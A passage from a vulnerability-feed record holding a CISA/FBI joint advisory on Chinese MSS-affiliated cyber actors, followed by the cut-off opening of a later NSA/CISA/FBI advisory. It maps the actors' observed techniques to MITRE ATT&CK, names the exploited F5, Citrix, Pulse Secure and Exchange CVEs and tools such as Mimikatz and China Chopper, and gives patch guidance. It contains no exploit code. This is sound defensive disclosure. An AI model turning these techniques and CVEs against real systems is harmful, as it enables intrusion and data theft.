defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:22:14", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n![](/sites/default/files/Example_of_tactics_and_techniques.png)\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE 